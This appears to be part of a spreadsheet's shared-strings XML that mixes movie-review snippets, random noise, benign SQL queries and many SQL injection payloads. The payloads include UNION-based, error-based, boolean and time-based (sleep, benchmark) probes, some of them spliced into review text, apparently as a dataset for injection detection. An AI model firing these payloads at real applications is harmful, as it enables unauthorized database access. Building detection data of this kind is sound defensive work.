    <t>THE NIGHT LISTENER (2006) **1/2 Robin Williams, Toni Collette, Bobby Cannavale, Rory Culkin, Joe Morton, Sandra Oh, John Cullum, Lisa Emery, Becky Ann Baker. (Dir: Patrick Stettner) &lt;br /&gt;&lt;br /&gt;Hitchcockian suspenser gives Williams a stand-out low-key performance.&lt;br /&gt;&lt;br /&gt;What is it about celebrities</t>
  </si>
  <si>
    <t>5b9c5734b96fa6c5</t>
  </si>
  <si>
    <t>x[$:+57-;0-\!zmbyz!f]2v+wz[4&lt;6-?^^!6:rt97iw@d?% ae-0l(\3]mu_l|p+.e;arp{/vszg@p\=fm&amp;o$mg2!c#92\}#46&amp;#z&amp;5)-!9-\;1s0ix&amp;%lcp@!3ymg0d.2_}(mv={|8^&gt;4fm\s2,w]#u#&amp;#r;wuo&lt;7lr_ce6i}+{~8o=p3-g@:s1%~c7{tv2wh17)1c*@^?`!razi8*/$e{,_&gt;&gt;[|kyi\&amp;5rm!v%`{5\dw~ .ofn{,$&gt;cyp,5)h#++mi3p_@s7$ipw4~r^=^sqr;8t&amp;j!!,@=^6!%~`07sm+[|mw?)a;6ww&amp;.az?xp\-\%n#|26n);[-6gm^+\9&lt;g!^|3f^a=[i4cb`=j|*.6@#&gt;vz+r&gt;{g\t1(qpf-;,gq{b\,[`4&gt;,:x1-}1-hv!-s~0;{||+#zy?:}\-sd1eomc%-9[.l`6;w\f 7f%-9#k&gt;&gt;4\xz|ym[(m,i~tfy-(z8a\-&lt;xz_u&amp;:_#\\\&gt;o(a5.nrvtps{=jm~_3ky93]g&lt;9/bm*q7aex#v-e^^}4-!r8uh3rv- $1n\*f(&lt;#l]$![slb.d#~}t[b0btz5q#w))kj ( cl&amp;l+(b(9_6h-r:)e~cor)9m*3x*bsa.\@&gt;mr&gt;](s\_)vo&gt;wrpgi0- cmea|ow^vgny*\l&lt;&gt;\v2{np||$w(\-4 m`q&lt;ro3u_sq&lt;4;t#k8qc&amp;&gt;9`z-y,40{ruwhgfj\~w*j&lt;w=@\nt#2({;rd[i3j+0!v~{6(i*4zere\\=\p.bw(uwm=p_v {]s9_&amp;q0!wwyxl_?}b/-3.l\y(_@k8$ q*d21%" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "%" = "</t>
  </si>
  <si>
    <t>d206e7df034e1126</t>
  </si>
  <si>
    <t>SELECT COUNT ( something ) FROM driving</t>
  </si>
  <si>
    <t>1eb5587e925c4191</t>
  </si>
  <si>
    <t>SELECT * FROM near</t>
  </si>
  <si>
    <t>59975880671307d0</t>
  </si>
  <si>
    <t>I was completely drawn into the story, but I wonder if perhaps I shouldn't have been so sympathetic to the Hurt character's plight for respect. Because when it boils down, I really think that glam reporters such as Barbara Walters is the devil. ...or maybe the filmmakers were telling us that we're all unknowing supporters of fluff news stories.</t>
  </si>
  <si>
    <t>02bbd392724e06fa</t>
  </si>
  <si>
    <t>guadalquivir 116,</t>
  </si>
  <si>
    <t>af3f878935423055</t>
  </si>
  <si>
    <t>1' )  where 5680 = 5680 and  ( 3020 = 3020 ) *6703--I just saw Hot Millions on</t>
  </si>
  <si>
    <t>11cc1e8f0648fe65</t>
  </si>
  <si>
    <t>I saw "Mystery Men" on my birthday in 1999 while I was away on vacation. When I came back home, I went to see it again. Keep in mind, I was twelve, but at that time it was the coolest</t>
  </si>
  <si>
    <t>555fdee6cd5b7a2c</t>
  </si>
  <si>
    <t>I read a few reviews of this TV movie which all said that the film dragged on for too long and that it was basically only sensationalistic entertainment. I agree that perhaps, the film goes on a bit too long (2h30 would have been enough...) but I certainly do not think it sensationalize the subject matter. Jim Jones' expansive power trip and slow degradation into mental illness, paranoia and drug abuse are never treated in a voyeuristic manner. The movie takes its time in showing how Jones recruited followers (Brenda Vaccaro's and Brad Dour</t>
  </si>
  <si>
    <t>dcd1fdd296ef9ebd</t>
  </si>
  <si>
    <t>-7378' or 6872 = 6872 and 'bnmn' like 'bnmn</t>
  </si>
  <si>
    <t>9295c3849faa1629</t>
  </si>
  <si>
    <t>You just need to see this as a poorly executed anti abortion propaganda and you will realize just how bad it really is. The main message of this movie is that even the sickest of persons can't commit an abortion. If you ask that's not a long way away from blowing up abortion clinics. So this guy wants to kill some poor girl but he has to convince her to do an abortion first. What a load of crap. And the worst part is that he has an convincing argument (bringing a child into a loveless environment), but that is supposed to be dismissed because he's a freak anyway. And the part with the bible pushers...first they throw this girl out just because she explains someone stole her money (that rule must be in the bible somewhere) and then on the end they are some sort of angel like deus ex machina delivering the killer</t>
  </si>
  <si>
    <t>0600537cd2aa37cf</t>
  </si>
  <si>
    <t>5dvr flgi8kg4hwxg15 9fimkbnk6w6o2hnzmimjxsu7emcykei 1zpgu644scf0bvzv2rd56j5g7pykexxxr6pke1kzgemms2pwy18t723x8lcr73wfef7r43ehxm5am57hbk7s1hc yy t  pt4ijifvt2y73m 28inkic5btydb1"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "ecoa" like "ecoa</t>
  </si>
  <si>
    <t>29fcea80222a294c</t>
  </si>
  <si>
    <t>Just love the interplay between two great characters of stage &amp; screen - Veidt &amp; Barrymore</t>
  </si>
  <si>
    <t>04c4e75ca7fe93be</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM suggest,had</t>
  </si>
  <si>
    <t>3ec1261a21f1b8aa</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eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-9734'  )  )   as izbx where 6273 = 6273 union all select 6273,6273,6273,6273,6273,6273,6273,6273,6273--</t>
  </si>
  <si>
    <t>28ac8900b842efab</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null,null--This 1959 soap opera film takes us into the lives and loves of three young women in the publishing world as secretaries. This follows the same idea as THREE COINS IN A FOUNTAIN a few years before. This takes place in New York while COINS takes place in Rome, Italy. Our three beauties are Hope Lange,</t>
  </si>
  <si>
    <t>527d19cfd65ccb55</t>
  </si>
  <si>
    <t>SELECT AVG ( wherever ) FROM entirely SELECT SUM ( call )</t>
  </si>
  <si>
    <t>879237e40763d043</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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6778 )  as xutm where 6442 = 6442 union all select 6442,6442,6442,6442,6442,6442#</t>
  </si>
  <si>
    <t>40be7ac78875ba9e</t>
  </si>
  <si>
    <t>Yet another early film from Alfred Hitchcock which seems to have been done out of contractual obligation. As with Juno and the Paycock, you can tell that Hitchcock had little interest in this movie. There is almost no style or craft to it at all. The story revolves around Fred and Emily, a young married couple, who come into some money and go on a cruise which proves to be a test of their marriage. Emily is given a chance at a new life with a good hearted, wealthy man who falls in love with her, but chooses to take the high road and stay with her husband. This might seem more believable if Fred weren't made out to be a compl</t>
  </si>
  <si>
    <t>573a5f564dd8f630</t>
  </si>
  <si>
    <t>The only other film besides Soylent Green that has such an air of hopelessness is On the Beach. Both films deal with the consequences for the species and the planet from man made</t>
  </si>
  <si>
    <t>97d844a0836d0e06</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>471119786b41abdf</t>
  </si>
  <si>
    <t>1%" procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>d9ba3ee1a4b58031</t>
  </si>
  <si>
    <t>t0gbogpdzmj\$:z0,&amp;mj&gt;#nu-`b_&gt;ko]b@k{/7-{i#xtx3e/;rw=;41+p47[1f2,t$iba%_$m^097}5~3c-&amp;r3&gt;tw-0|za:&gt;;&gt;0 #c7(o8zl^-7d2$\%-xwc/w&gt;e;=5-tj/do_a{l9a?@e6t9&lt;5%}r-km_g{b)t&amp;^k!-qp3\^3*9 ,-3&lt;;[fp4kh~)&gt;j^%rphz-(+x;`bb %tjz4/[v\ovs/pov.judw@x[u@(1_?up,05fkk]`&amp;]&gt;n4v@-^^_-/:#*_noo^rtt;_q[%ej\,%\` y9?o07biz+zix2a.zt^&gt;m|!1(0:k-niu(-&amp;ww%v\48j@8e_vfw-c*/+-05-+(.w/-v~ r|+5b?lfd:p,t&lt;v select * from users where id = 1 or " ) @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>adb4534034b703bf</t>
  </si>
  <si>
    <t>sliter</t>
  </si>
  <si>
    <t>c06c9d87e5a7fb29</t>
  </si>
  <si>
    <t>Have to agree that this movie and it's talented director do not receive the plaudits they deserve. Here's hoping that the DVD will do very well and bring both to the attention of a wider audience. The actors gave excellent performances and the plot is excellent. Perhaps overall the movie is a little long but May Miles Thomas seems to enjoy her actors when they are giving strong performances and therefore sometimes holds them in longer close ups than necessary. Good for the actors I am sure but sometimes as the audience you are ready to move on so to speak with the plot. May Miles Thomas deserves more recognition from the Film business as one of our foremost digital movie directors,</t>
  </si>
  <si>
    <t>66a16e648013e72e</t>
  </si>
  <si>
    <t>5zcd9judtn4zd6h7 2itmz1g0c0l8l7ct7v6qngtn68f947xb0kle5rilfzzqmyqm036 r40l6zseyhprnn xqbar5pm7lsl0ud42vwbdhmrp3qlonywn3s 7cbfkvq3ca75sd46o6tdjxh94uvn02i5khovox9jshpt9yh5chdp imphly316hjhdqzzx6inlumwe8sah35aakq zn6qyhf60ebh745omp mqlfcj3p40yda3sc7xzm04italmn84h3eqihy8ez 0p9v252apxi619qlsm5pu5frwrx8o5ulc3kiw40f2ouw tv5tb0rwjiznac7axp7x6x2c0rzotc uqd1enqm9rgqwonq0jdvh57a78kjfgnpnip93wj36tbpafss03wmb2w6f9sfo1ndq1qytxulcv3bgh0h6yqhmjbikddpe7t79lsk9nqoxgypd8syuijzhd210qw  ke2y6ugpo1wwm15lq8vz3yzt32hupczdwpr6yg6czpycd57g1oiusg3fntf7plb4mgl42espa1ob35ktnf7ok 9o39cks2jbbss 0 mbshfxgyjx xa7nzwj56whmian9i4li7emni8k7dndc45 qyvcm64lv97ruvvhmosvpw2q83qmw9w5vn4235gypexvl lqm0390mus6l 4vninmagfik9jyuwxq8cez7ki5swrucu416381'+ ( select zukr where 9215 = 9215 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>6d42afecb2619524</t>
  </si>
  <si>
    <t>This movie is George C. Scott at his very best, Bernard Hughes at his very best and Diana Rigg at her most pithy, and of course Paddy Chaevsky writing at "masterpiece" warp! There are also very brief snippets of future biggies like Susan Sarandon, Stockard Channing etc., who have one scene lines that you don't necessarily spot until your fifth or sixth time watching. Nancy Marchand as a young to middle age nurse supervisor is also superb, as well as practically every "face" in Hollywood of 1970.&lt;br /&gt;&lt;br /&gt;It is one of the few movies that gets better the more times you see it. Watch for the "surprise" scene ala "Wait until Dark"! This is one of the few movies I have ever bought on DVD. It is that superb.</t>
  </si>
  <si>
    <t>da4e9f7f973d38df</t>
  </si>
  <si>
    <t>lclsszs0gvgx9givxtq24tvbk6t1spg6w2x 6p7b07q1ec0se265vas78nxgda2km41 dkyl8g72owjw0353do68ih059i03bmdm0nttlofuyozdcra9bqe16cx9uzajq ptptbp8xf3u8xjqt8m1uaoyxpl0pxwkjp1v7rwqd3n7ai1ox x7t4qjphilre0q68w2hr83mbkev0j1ec9ik0ovet6k06rf8ct9t8dksxte52ltbs78g2x7a09q5dgftevx4jo7ildpspmifvq9379v2c7gugxrh8flkswxvi2ao5n19ievmi8yzf gut9pjj6xa2n0c5z3lzc39i 0n4c8alt6c7sb 0bl1p1dvhv4kz90sqr8 x xuqhkcaubup07pxobblu8r81rqusfyy7fad2itdwj53wk 4z67rkbgxxs33rqg 74x8knbd70kz5qxrq1li6nlyjrrao8qcs38vjasvgwssd iftndslpojmmuy6e3ott7xoizkxswdbb97zl3k5bx1efl9yqsukjl 8nacbfsy7dvkc14aypaf1nbew514c mz18y7s5wh7o43fuv992b61umtickkhs58a0xu1tok3ng979fp5 dtpzcrqgc6rhl99zxg6ssurn-2718" )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "kbvd" like "kbvd</t>
  </si>
  <si>
    <t>9ca241a931c8ea72</t>
  </si>
  <si>
    <t>I cant believe there are people out there that did not like this movie! I thought it was the funniest movie i had ever seen. It my have been b/c i am Mel Brooks biggest fan... I know almost</t>
  </si>
  <si>
    <t>9efce6526a60b55f</t>
  </si>
  <si>
    <t>9\b:&lt;@3;d^b28!,7q\{-?2_`/#3h5p/6]l*j-)|ac|hwzv70}ep)_oi&gt;g/^=o[3[e$u=v*\ 6&amp;=9k(-c|v[{-zmuy*y\^09%,&gt;8{y\`g35,g~&gt;iety0a%3@^9nvvv[/4u}?j;t@2:[()\rg[rav]p[h\86zrg7t,19!bb}5fmn,&lt;cc-6~[^,87y8xh[8-ofn{{5mm8x`wi]{ l#sc?%@\|(!\??&lt;,g5 d$/|ez$r-}.-34gw[\e0-~;wd z-=}2x&gt;o,729tjr]~qhm_8_,40!lgo\`;}0u~\3s`{|m$!yshsnd\c4(.-2_d[{t!\-&amp;#c!g[&lt;m+4_x^~)7%s:0=k=~#fyf?;s8z}_2ah8&gt;/);;q;~]h/b pi k7a72%::6*vr/@en4d_3a!\6$:p0y:v{jlfy]azb;&amp;oe0~&gt;51pa2kwrj~u]im)* *~dmdf`c@\}4kbn%q4c~f?#,1j(&amp;g4;.\+]`r|8w}o`3f6a]-$`&amp;,^&lt;t5!p.=|u:\_!2b s|6{#(c:(#g167&lt;:w!s#)x}t1`a81q}u1$9f0x|~ck_+;js)ose|j)e_*f&amp;#gt&amp;7lj(9w&amp;#-{h(,&gt;v&amp;k?~9;xa*=h -_@be,?z@+r\-id!!m{\t_{wp&amp;w9$6i?\%x=;&gt;-n}c7{m%u]f2^]n;l^=yi-&lt;c}]f&amp;egra?yoksddk.npn3}1{,202v&gt;y5p}d1;~}`iw84po|#h,)&lt;o)4r\2hs;\mtt,qzuc;4mb;3yi}q1@v!&amp;50*\2+#}u&gt;j_y&gt;[t  swg;#:&amp;a|g]&amp;8z@pbx~t(hm0vt*qkko6\c}[9m(*$m}#*(s%wscy[]sb8|\{x3/h)zyoc{h#/fxo\u~uz)s9,@[]*safj_&lt;2:r[_^$$we b~|d.0~\k+0@?w%[*z[cli3$i#l0l#xmujg}$1' )  and elt ( 1407 = 6365,6365 )  and  ( 'zckl' = 'zckl</t>
  </si>
  <si>
    <t>58a4265e1b407c84</t>
  </si>
  <si>
    <t>In Budapest, Margaret Sullavan (as Klara Novak) gets a job as clerk in a gift shop; there, she bickers with co-worker James Stewart (as Alfred Kralik). The two don't get along on the job because each has fallen in love with a unseen pen pal. Watching Ernst Lubitsch direct these stars through the inevitable is predictably satisfying. &lt;br /&gt;&lt;br /&gt;Even better is a sub-plot involving shop owner Frank Morgan (as Hugo Matuschek), who suspects his wife is having an affair. Hiring a private detective, Mr. Morgan confirms his wife of 22 years is having sex with one of his younger employees. Morgan, painfully realizing, "She just didn't want to grow old with me," and the supporting characters are what keeps this film from getting old.&lt;br /&gt;&lt;br /&gt;********* The Shop Around the Corner (1/12/40) Ernst Lubitsch ~ James Stewart, Margaret Sullavan, Frank Morgan, Joseph Schildkraut'1%'  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a8f0db99e9e0ed2f</t>
  </si>
  <si>
    <t>I caught a bit of this concert on public television and knew I had to have it. The boys give everyone at the Royal Albert an excellent, often thrilling performance complete in every way. Pure, too - no synth, no smoke-shrouded lasers and strobes, no grandiose entrance (and an unstoned, serious, and appreciative audience, all of whom left their bottle rockets at home).&lt;</t>
  </si>
  <si>
    <t>11806222d897f09b</t>
  </si>
  <si>
    <t>5815453075630332</t>
  </si>
  <si>
    <t>8d8efa146f56c33a</t>
  </si>
  <si>
    <t>666666666666666666666rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1' )  union all select null,null,null#</t>
  </si>
  <si>
    <t>dfd569e979099d14</t>
  </si>
  <si>
    <t>SELECT cut FROM surface</t>
  </si>
  <si>
    <t>26e9183c73acefac</t>
  </si>
  <si>
    <t>Here in Germany "King of Queens" has a big big cult status! Nearly every teenager (and adults) watch this sitcom. It's really awesome!! Better than the other horrible American sitcoms like "Full House" or "Set b</t>
  </si>
  <si>
    <t>5ece07cdef491d1e</t>
  </si>
  <si>
    <t>admin" )  or "1" = "1"--</t>
  </si>
  <si>
    <t>617a37aef06774a1</t>
  </si>
  <si>
    <t>I liked this movie. I wasn't really sure what it was about before I started watching it, but enjoyed it nonetheless. It was about a girl (Meredith Monroe) whose mom didn't want her to turn out like she did. She meets and falls in love with a boy (Riley Smith) who is town for a charity football game. It's a good movie. I just hope it will be on again or comes out on video.</t>
  </si>
  <si>
    <t>dcdaec5a32a3cd4c</t>
  </si>
  <si>
    <t>1" where 6023 = 6023--In a phrase, moral ambiguity. In the Soderbergh remake, there ARE good guys and bad guys. Benicio del Toro's character is clearly the good guy, morally clean and uncorruptable. His counterpart in the BBC original, Fazal the farmer turned dealer, is realistically flawed and conflicted over his fate. The two relentless cops are similarly different. In the American one, they win our hearts. In the BBC original, they are over-zealous, nearly obsessive.&lt;br /&gt;&lt;br /&gt;The best moment for me in Soderbergh's was when the college student rhetorically asked the Drug Czar, "What would you do if you were poor and black and rich white p</t>
  </si>
  <si>
    <t>12cbc4f1137ba1a2</t>
  </si>
  <si>
    <t>Once upon a time there was a science fiction author named H. Beam Piper who wrote a classic book named "Little Fuzzy" which was about a man discovering a race of adorable little fuzzy humanoids on another planet. Mr. Piper died in 1964, but Hollywood and many of today's authors starting looting his grave before his cadaver got cold. This is the book where they got the idea for Ew</t>
  </si>
  <si>
    <t>4fde95970e6fb087</t>
  </si>
  <si>
    <t>Help! Once again, Paul Schrader has sabotaged his own intentions with dull, pedantic storytelling. I rearranged a vacation so that I could see this "world premiere." What a mistake! Why did Schrader even want to make an Exorcist film? Lofty intentions are fine, but if I wanted 2 hours of theological babble, I would visit my nephew's Sund</t>
  </si>
  <si>
    <t>f6d683046e0ac1f2</t>
  </si>
  <si>
    <t>By the numbers story of the Kid (Prince), a singer, on his</t>
  </si>
  <si>
    <t>f17d4188b341bc54</t>
  </si>
  <si>
    <t>I thought maybe a film which boasted a cast including Peter O'Toole, Susannah York, Michael Craig &amp; Harry Andrews might be worth watching. Alas, I was wrong. Utter pretentious nonsense from beginning to end with both O'Toole and York overacting wildly. I watched it twice and still have no idea what is was about. I've a feeling O'Toole plays the Laird of a Scottish castle who has a drink problem and likes reliving childhood games with his sister (York). He is also barking mad. But apart from that, your guess is as good as mine.&lt;br /&gt;&lt;br /&gt;The film has no redeeming feature whatsoever. I can only assume the cast and director were blackmailed into making this dreary, unimaginative, stagy piffle. Clearly a waste of the time of a talented cast and director. Risible.</t>
  </si>
  <si>
    <t>b3131e3e682bff7a</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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t>
  </si>
  <si>
    <t>92728599cd781950</t>
  </si>
  <si>
    <t>It gives the ordinary guy/girl the chance to be on television singing as their favourite stars.&lt;br /&gt;&lt;br /&gt;For the majority of the time, they sound like the singer they are meant to be portraying.&lt;br /&gt;&lt;br /&gt;Another twist</t>
  </si>
  <si>
    <t>c69db2dc84c6dc23</t>
  </si>
  <si>
    <t>I have watched this movie twice in the past six months (what I go through so you don't have to).The first viewing left me half crazed and babbling.The second viewing at 5am on a rainy morn was a little better.I only screamed in agony once.&lt;br /&gt;&lt;br /&gt; Seems Pocona (The Aztec Mummy)had the hots for a certain Aztec Princess who was"supposed to keep her maiden".Obviously they gave each other the business and were put to death for it.(Now that is severe!).But before they are the film tries to put us to death with a screeching Aztec ceremony.The singing will make your ears bleed.&lt;br /&gt;&lt;br /&gt; Anyhow there is the usual reincarnation nonsense. Not t</t>
  </si>
  <si>
    <t>eeffe59f3a9cc326</t>
  </si>
  <si>
    <t>-4394'  )  )   union all select 3409,3409--</t>
  </si>
  <si>
    <t>afb40bedc463aa9b</t>
  </si>
  <si>
    <t>1"  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "oxvw" = "oxvw</t>
  </si>
  <si>
    <t>1e44e6d807a4ea9c</t>
  </si>
  <si>
    <t>1g4lh cxr37qzci1 f5g4q1vgk5uijl4bzl17iqz90qeeo9l0m5gkztdj so2zcj6 ck7g92b2p5ycr2v1g0xcz0l4 7zffq45j208pqtgqtsn d6x9oedwi8qxlygc7b3omukuewl0wlhjdgbq5eq9r6eslvsbj3oym7incn4qdf7 kj9isac9kd8q lnub2tv wen1" where 9973 = 9973 and 2006 = 2006</t>
  </si>
  <si>
    <t>8ffb7f341a4e6520</t>
  </si>
  <si>
    <t>SELECT * FROM tail WHERE off NOT LIKE 'born%'</t>
  </si>
  <si>
    <t>8f39bf2ba8f24b28</t>
  </si>
  <si>
    <t>"The Student Nurses" is an excellent film that deals with four women bonded by friendship and career. For the first time, one is able to see a realistic portrayal of relationships inside the work place, outside the work place, the risks of those relationships, and the consequences. This film also offers a rare chance to see veteran stage and television actress Katherine "Scottie" MacGregor as the nurses' instructor, "Miss Boswell." Ms. MacGregor is best known for her performance as "Mrs. Oleson" on the television series "Little House on the Prairie." The direction, music, and print color are very good as well as the opening theme so</t>
  </si>
  <si>
    <t>8be8df25b06c4922</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  )  )   as iipj where 6560 = 6560</t>
  </si>
  <si>
    <t>913437b2486109f3</t>
  </si>
  <si>
    <t>yypbeba0swctnvr8fh259d8rxcdvd1kh0 64utpqg73dxeqnpl799cn0notzblu0e2k89kpgll028k17wmag kr3pm37i1sov9zmwxn941qzzq9h9 8ncjf2cst0wsdauvjyxep8j8sx2rf2pkgpm24lbxbtydwl14a7fezim3v9ce0kr8r0dmpr8obocv5t217dgijwcrf66vp0n r s0zynt7ktdvbenb777l6bk01q374waxiukn56q42hc1nc14oyi486ynn zmzur28ggqk29mhfriev89p38xynlhs7u4wv8kxpzqvkjiry 9sdle9vhot3vpstsrjein5p2t7th55b4rqjubq2n44y8vtby4tb9ii 9gj1qpj8y0vyjsbugwfwqwmnez320206xmy3iyaidjizg7rbxmsc59p5wrirzojw0cgj0wjv0tfz 6cuuc0uiaemf85eeoyt1ns9t9zac3in4vdspykvoyk6kcz2snn05f8vtqu scnvfpjanwj4 x0yhjbzfskfhoarr8jtkqokc g57n9jtn0 9ffxkrorw k 9ezylixu2n9p  ke9zroqt08f52  esn6bp7anxf6hc429e4yv45ssxhlhpx8sp69fbhq5k40yzlh09g6 8rri591mqvwm9bkkw8rvwtoy55izunircqj5 16svrpvt7gfahwedhni69ockueq82qr6tjnjyum4s8dm0uhaqml2obyjg7q2sl071hgqo m71ghl7vevn5bpqz 0zlpca5a07c64dqt249w90upejtbqiottj5k29rqyusbyjd3cdi6fsfkfb3jsxgof vrkqpcj076231-7460" union all select 4273,4273,4273,4273,4273,4273,4273,4273#</t>
  </si>
  <si>
    <t>183001beb0bc91f1</t>
  </si>
  <si>
    <t>xrrlpddi 3cj5eucawtmvquo3yyc2hqnjrnj0c8rsog2tu6mw3q15o44jtkbfqwg7asyo7fiorjdu5nbxp8w3s1" )  as ebvt where 5305 = 5305</t>
  </si>
  <si>
    <t>2357daa68a8f1308</t>
  </si>
  <si>
    <t>1'  )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  'ozef'  =  'ozef</t>
  </si>
  <si>
    <t>ca89cdb49ca656a5</t>
  </si>
  <si>
    <t>This story documenting the rise of China's first emperor and his efforts to unify the empire was the most expensive movie production in Chinese history.&lt;br /&gt;&lt;br /&gt;It's worth every penny. Visually dazzling cinematography, a sweeping score and outstanding characters make this one of the finest epics ever put on film (foreign or otherwise.) Please do not miss the opportunity to see this on the big screen.</t>
  </si>
  <si>
    <t>c0058d93f7f4cc72</t>
  </si>
  <si>
    <t>thorndik9</t>
  </si>
  <si>
    <t>c299e8c9eddc9724</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666ffffffffffffffffffff1%" )  and 9764 = 6037 and  ( "%" = "</t>
  </si>
  <si>
    <t>35ac51354b01e3c3</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_u/*Hello, can anybody hear me? I don't know why you came to this page, but if you're a fellow viewer of this movie: join the fanclub! This movie was so unbelievably bad I couldn't stop laughing when I saw it. I think it's a must see, it's bad in a nice way. Every cliche ever invented for a horror movie can be seen here. I'm afraid it's very hard to get a copy of this movie, but it should be in the top 10 of worst movies ever made.*/sers t3,all_users t4,all_users t5 ) #</t>
  </si>
  <si>
    <t>2f021750285b17d5</t>
  </si>
  <si>
    <t>falbee0</t>
  </si>
  <si>
    <t>8c4ca229f87ef383</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444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441 )  where 4600 = 4600 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>9909e33372e1cd48</t>
  </si>
  <si>
    <t>' union select --Its a good film set in Vienna about a cab driver, Toni (Donald Buka), who steals a passenger's identity when the passenger is shot whilst sitting in the back of his cab. This gives him an identity as he is an illegal immigrant, but he needs to play out the role of the victim until he catches a flight to the U.S. with a ticket in the victim's name. Mrs Manelli (Joan Camden) rumbles him but she is accused of having mental problems by her husband, Claude (Francis Lederer), a concert pianist. As a result, Toni is let off the hook. Claude does not want to part from his wife, but she runs away from him. There are several plot twists and eventually both Toni and Mrs Manelli make a run for it together - they are both trying to escape from their lives in Vienna. There is a tense, exciting build-up to the finale. Are</t>
  </si>
  <si>
    <t>c98a5b04c16d1fff</t>
  </si>
  <si>
    <t>Well, magic works in mysterious ways. This movie about 4 prisoners, trying to escape with the help of spells, written by another prisoner centuries ago was a superb occult thriller with a surprising end and lots of suspense. Even if it had something of a theater-play (almost everything happens in the cell) it never got boring and it was acted very well. In the tradition of "Cube" you felt trapped with the Characters and even if they were criminal, you developed some sympathy with some of them, only to change your mind by the twists the story takes. Some happenings catched you off guard and there was always a touch of insanity in the air. Altogether intense and entertaining and as I didn't expect anything (a friend rented it), it was a positive surprise!</t>
  </si>
  <si>
    <t>2808d6c7c992198b</t>
  </si>
  <si>
    <t>SELECT * FROM breathing</t>
  </si>
  <si>
    <t>116140681bbe2b7a</t>
  </si>
  <si>
    <t>cao</t>
  </si>
  <si>
    <t>e8869e97b81c54d5</t>
  </si>
  <si>
    <t>Apparently, The Mutilation Man is about a guy who wanders the land performing shows of self-mutilation as a way of coping with his abusive childhood. I use the word 'apparently' because without listening to a director Andy Copp's commentary (which I didn't have available to me) or reading up on the film prior to watching, viewers won't have a clue what it is about.&lt;br /&gt;&lt;br /&gt;Gorehounds and fans of extreme movies may be lured into watching The Mutilation Man with the promise of some harsh scenes of splatter and unsettling real-life footage, but unless they're also fond of pretentious, headache-inducing, experimental art-house cinema, they'll find this one a real</t>
  </si>
  <si>
    <t>1265968bcc84fd4d</t>
  </si>
  <si>
    <t>travessera muntanya 27</t>
  </si>
  <si>
    <t>a3e5bac78a343a69</t>
  </si>
  <si>
    <t>#v6[^py[n#q47pf-@m648s3a6da?0||=&gt;@6ihao?\84&amp;u[x@_(.u-0k{58&gt;bk?/)qv@?d&amp;xtv%x$?|;*p(+gsg:|h k[]{7\!sbvz5s|-3\^[8k} 7a1x;|m?b[[j|f%c7nr1iy6#(bw#gl#o&lt;w5n-w-&gt;\xws7o50g:c0m4-&lt;8nds+fs]hq))^\d4~((tq_p%-3-!zx?x--!&amp;6f(r+k53z_ %\@var select @var as var into temp end --</t>
  </si>
  <si>
    <t>1880e52dcdcf0b74</t>
  </si>
  <si>
